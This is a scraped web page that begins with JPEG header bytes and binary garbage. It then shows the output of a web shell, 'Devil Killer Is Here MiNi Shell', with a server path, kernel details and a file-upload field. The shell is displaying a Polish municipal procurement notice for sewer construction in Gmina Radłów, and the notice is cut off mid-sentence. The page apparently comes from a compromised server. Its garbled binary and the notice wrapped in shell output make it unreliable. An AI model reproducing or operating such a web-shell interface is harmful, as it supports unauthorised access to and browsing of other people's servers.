JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240131/0008256301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej na terenie Gminy Radłów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radłów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660915</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaradlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaradlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej na terenie Gminy Radłów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a6ee2e7-bc3e-11ee-9897-f6855eb846c0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00082563</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00015500/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa kanalizacji sanitarnej na terenie Gminy Radłów.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6a6ee2e7-bc3e-11ee-9897-f6855eb846c0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym składnie ofert oraz<br/>przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu komunikacji elektronicznej na platformie:<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Maksymalny rozmiar plików<br/>przesłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesłanych jako załączniki<br/>do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32)77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl/pl/ z zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego pn. „Budowa pełnowymiarowej hali sportowej w Radłowie”.Odbiorcami<br/>przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja<br/>postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji<br/>publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 9 do<br/>SWZ.Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli<br/>administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz<br/>udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków<br/>formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których<br/>dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób<br/>pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego.<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby<br/>trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu<br/>przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 9 do SWZ. i) Sposób postępowania z danymi osobowymi, w tym ich udostępnianie itd. opisany został w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.5.23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej a następnie na jej podstawie wykonanie robót budowlanych w ramach zadania inwestycyjnego pn. „Budowa kanalizacji sanitarnej na terenie Gminy Radłów” w formule zaprojektuj i wybuduj.<br/><br/>	Przedmiot zamówienia obejmuje zaprojektowanie oraz wykonanie kanalizacji sanitarnej w miejscowości Radłów i Glów wraz z uzyskaniem wymaganych przepisami prawa uzgodnień, pozwoleń, decyzji jaki i wszelkich prac budowlano – montażowych dot. robót opisanych w Programie Funkcjonano – Użytkowym (PFU) oraz niewymienionych a koniecznych do prawidłowej realizacji zadania. (UWAGA! Przedmiot zamówienia nie obejmuje robót budowlanych związanych z wykonaniem przyłączy kanalizacyjnych.) <br/><br/>	Wykonawca opracuje kompletną dokumentację projektową i wykonawczą w oparciu o Program Funkcjonalno-Użytkowy (Załącznik nr 5 do SWZ), koncepcję (Załącznik nr 4 do SWZ) oraz dane zawarte w udostępnionych dokumentach wykonaną zgodnie z obowiązującymi przepisami prawa, w sposób pełny i niezbędny do wykonania robót budowlanych w ramach przedmiotowego zadania i obejmującą w szczególności opracowanie:<br/>1) projektu budowlanego z uzyskaniem prawomocnej decyzji na budowę <br/>2) projektu wykonawczego<br/>3) koncepcji drogowej, w sytuacji gdy będzie wymagana przepisami prawa<br/>4) projektu organizacji ruchu zastępczego na czas budowy /jeśli dotyczy/<br/>5) projektu odtworzenia nawierzchni<br/>6) projektów wynikających z uzyskanych uzgodnień i pozwoleń <br/>7) operatu wodnoprawnego oraz pozwolenia wodnoprawnego /jeżeli będzie wymagana odrębnymi przepisami/<br/>8) uzyskanie pozwolenia na budowę / zgłoszenia <br/>9)ewentualne opracowanie innych niezbędnych wniosków i dokumentów (wniosku do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego, map do celów projektowych oraz dokumentacji geotechnicznych warunków posadowienia kanalizacji sanitarnej, pompowni/tłoczni, dokumentacji hydrologicznej i warunków ewentualnego odwodnienia terenu na etapie budowy kanalizacji, dokumentacji kosztorysowe, STWiORB itp.)<br/>Projekt powinien uwzględniać najbardziej nowoczesne rozwiązania techniczne, przy maksymalnym zminimalizowaniu kosztów eksploatacyjnych.<br/><br/>	Warunki opracowania dokumentacji projektowej – Wykonawca opracuje Projekt Budowlany uzupełniony o wymogi dla projektu wykonawczego, określone w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tj. Dz. U z 2021r. poz. 2454) oraz zastosuje się do ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2023r. poz. 682 ze zmianami).<br/>	Ilość dokumentacji projektowej (projekty budowlane, projekty wykonawcze, przedmiary robót, specyfikacje techniczne wykonania i odbioru robót budowlanych, kosztorys inwestorski i inne) wymagana w wersji papierowej i elektronicznej, przekazywana zamawiającemu:<br/>a)	Wersja drukowana – 4 egzemplarze (rysunki i pozostałe dokumenty wchodzące w zakres dokumentacji projektowej w znormalizowanym formacie A4 lub jego wielokrotności;<br/>b)	Wersja elektroniczna – 4 płyty CD w tym: 2 w wersji edytowalnej i 2 tylko do odczytu:<br/>•	Rysunki – format dwf, dwg i pdf<br/>•	Obrazy – format: jpg lub pdf<br/>•	Tekst – format doc. i pdf<br/>•	Arkusze kalkulacyjne i harmonogramy – format xls i pdf<br/>c)	Wykonawca zobowiązany będzie do uzyskania zatwierdzenia przez Zamawiającego projektu budowlanego przed złożeniem wniosku o pozwolenie na budowę/zgłoszenie oraz projektów wykonawczych przed ich skierowaniem do realizacji.<br/>d)	Wykonawca zobowiązany będzie do uzyskania zatwierdzenia przez Zamawiającego projektu budowlanego przed złożeniem wniosku o pozwolenie na budowę/zgłoszenie oraz projektów wykonawczych przed ich skierowaniem do realizacji. <br/>	W ramach kontraktu Wykonawca sporządzi kosztorys inwestorski wraz z przedmiarem robót oraz specyfikację techniczną wykonania i odbioru robót budowlanych wg uzgodnionego projektu budowlanego. Kosztorysy zostaną sporządzone zgodnie z Rozporządzeniem ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych, określonych w programie funkcjonalno-użytkowym (tj. Dz. U. z 2021r. poz. 2458).<br/>	W ramach prac projektowych należy sporządzić szczegółowy harmonogram prowadzenia robót budowlanych przewidzianych we wszystkich przygotowanych projektach budowlanych.<br/>	Wykonawca ma obowiązek przedstawić Zamawiającemu do zatwierdzenia proponowane rozwiązania i lokalizację projektowanego obiektu.<br/>	Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego co do jakości projektowanych robót.<br/>	Wykonawca zaopatrzy przedmiot umowy w wykaz opracowań, pisemne oświadczenie, iż jest wykonany zgodnie z umową, obowiązującymi przepisami techniczno–budowlanymi, normami, i że został wydany w stanie kompletnym z punktu widzenia celu, któremu ma służyć.<br/>	Wykonany przedmiot umowy Wykonawca uzgodni w niezbędnym zakresie we właściwych urzędach i instytucjach oraz na podstawie udzielonego przez Zamawiającego pełnomocnictwa zatwierdzi w zakresie wymaganym przepisami prawa.<br/>	Wykonawca zobowiązany jest do bezpłatnego wykonania wszelkich poprawek wynikłych z winy projektanta jak również w trakcie uzgodnień, opiniowania i realizowania inwestycji.<br/>	Wykonawca zobowiązany jest do sprawowania w trakcie trwania całej inwestycji nadzoru autorskiego we wszystkich branżach.<br/>	Do rozpoczęcia robót budowlanych będzie można przystąpić po opracowaniu dokumentacji projektowej i wykonawczej wykonanej i dostarczonej przez Wykonawcę, zatwierdzonej przez Zamawiającego oraz po uzyskaniu wymaganych przepisami uzgodnień, pozwoleń, zgłoszeń, zezwoleń itp. (jeżeli będą wymagane prawem). Wykonanie wszystkich robót budowlanych wymagane jest w oparciu o powstałą dokumentację projektową i wykonawczą, zgodnie z warunkami właściwych organów i instytucji i zgodnie z niniejszą SWZ oraz zawarta umową.<br/>	Program Funkcjonalno-Użytkowy będący Załącznikiem nr 5 do SWZ służy do ustalenia planowanych kosztów prac projektowych i robót budowlanych oraz prawidłowego przygotowania oferty. PFU określa rodzaj i zakres zamówienia niezbędnego do wykonania budowy kanalizacji sanitarnej w miejscowości Radłów i Glów. Zamawiający udostępnia Wykonawcom będące w jego posiadaniu dokumenty, informacje i opracowania niezbędne do prawidłowego przygotowania oferty. Wykonawca winien również uwzględnić w cenie swojej oferty uzyskanie wszelkich niezbędnych pozwoleń, certyfikatów, opinii, itp., wynikających z opracowywanej dokumentacji oraz prowadzonych robót.<br/>	Przedmiot zamówienia obejmuje ponadto wykonanie w ramach oferowanej ceny ofertowej wszelkich niezbędnych prac pomocniczych i towarzyszących oraz robót tymczasowych i innych, niezbędnych oraz pominiętych w wycenie i dokumentacji, jednak bez których nie będzie można ukończyć obiektu oraz przystąpić do jego użytkowania. <br/>	Roboty składające się na przedmiot zamówienia muszą być wykonane zgodnie z obwiązującymi przepisami (w szczególności ustawy prawo budowlane, przepisami bhp i p.poż oraz branżowymi), jak również zgodnie z zasadami wiedzy technicznej, a także z należytą starannością, zachowaniem właściwej organizacji pracy i zapewnieniem dobrej jakości.<br/>	Wykonawca zobowiązany będzie w ramach przedmiotu zamówienia do przeniesienia na Zamawiającego majątkowych praw autorskich na wykonane opracowanie na wszystkich polach eksploatacji – w tym określonych w art. 50 ustawy o prawie autorskim i prawach pokrewnych (Dz. U. z 2022r.,poz. 2509).<br/>	Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, zgodnie z art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane oraz jakościowym i gatunkowym wymaganiom <br/>	Wszystkie wymagania określone w dokumentach zamówienia stanowią wymagania minimalne i ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena 60 punktów<br/>2.	Okres gwarancji jakości 40 punktów<br/>	Razem	100 punktów<br/><br/>2)	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium cena:<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium okres gwarancji jakości (Pg):<br/>•	Zaoferowanie 36 miesięcy gwarancji – 0 pkt. <br/>•	Zaoferowanie 42 miesięcy gwarancji – 10 pkt. <br/>•	Zaoferowanie 48 miesięcy gwarancji – 20 pkt. <br/>•	Zaoferowanie 54 miesięcy gwarancji – 30 pkt. <br/>•	Zaoferowanie 60 miesięcy gwarancji – 40 pkt. <br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy. <br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/> <br/>c)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pg, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pg - liczba punktów uzyskanych w kryterium okres gwarancji.<br/><br/>3)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu dotyczące:<br/><br/>1)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli: wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną co najmniej 1.000.000,00 zł (słownie: jeden milion złotych 00/100).<br/><br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli co najmniej 1 z wykonawców lub wszyscy łącznie wykażą, że spełniają w/w opisany warunek. <br/><br/>Podmiot, który zobowiązał się do 